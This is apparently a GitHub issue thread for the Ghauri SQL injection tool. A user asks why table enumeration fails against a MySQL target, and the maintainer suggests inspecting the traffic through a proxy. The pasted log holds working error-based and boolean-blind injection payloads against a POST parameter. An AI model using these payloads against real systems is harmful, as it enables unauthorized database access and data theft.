### ISSUE TITLE
it was not possible to extract query output length for the SQL query provided

### ISSUE THREAD

**Issue by erengozaydin** [r0oth3x49/ghauri#68]
Hello.

I can read the database name, the current user and the banner, but I get this warning when I want to read the tables.

How can I overcome this.

[06:39:30] [INFO] parsing HTTP request from 'req5.txt'
[06:39:30] [INFO] testing connection to the target URL
Ghauri resumed the following injection point(s) from stored session:
---                                                                                                                        
Parameter: aranan (POST)                                                                                                   
    Type: error-based                                                                                                      
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)                         
    Payload: aranan=rrr') AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)-- wXyW
                                                                                                                           
    Type: boolean-based blind                                                                                              
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)                                                           
    Payload: aranan=rrr') OR NOT 05939=5939-- wXyW                                                                         
---                                                                                                                        
[06:39:30] [INFO] testing MySQL
[06:39:30] [INFO] confirming MySQL
[06:39:30] [INFO] the back-end DBMS is MySQL
[06:39:30] [INFO] fetching tables for database: db1_******
[06:39:30] [INFO] fetching number of tables for database 'db1_*****'
[06:39:35] [WARNING] it was not possible to extract query output length for the SQL query provided.
[06:39:35] [ERROR] unable to retrieve the table names for any database

**Comment by r0oth3x49** [comment]
@erengozaydin this is intended response in case queries executed fails to return response or blocked somehow. You can. Try manually by passing burp as proxy to see what's going on.
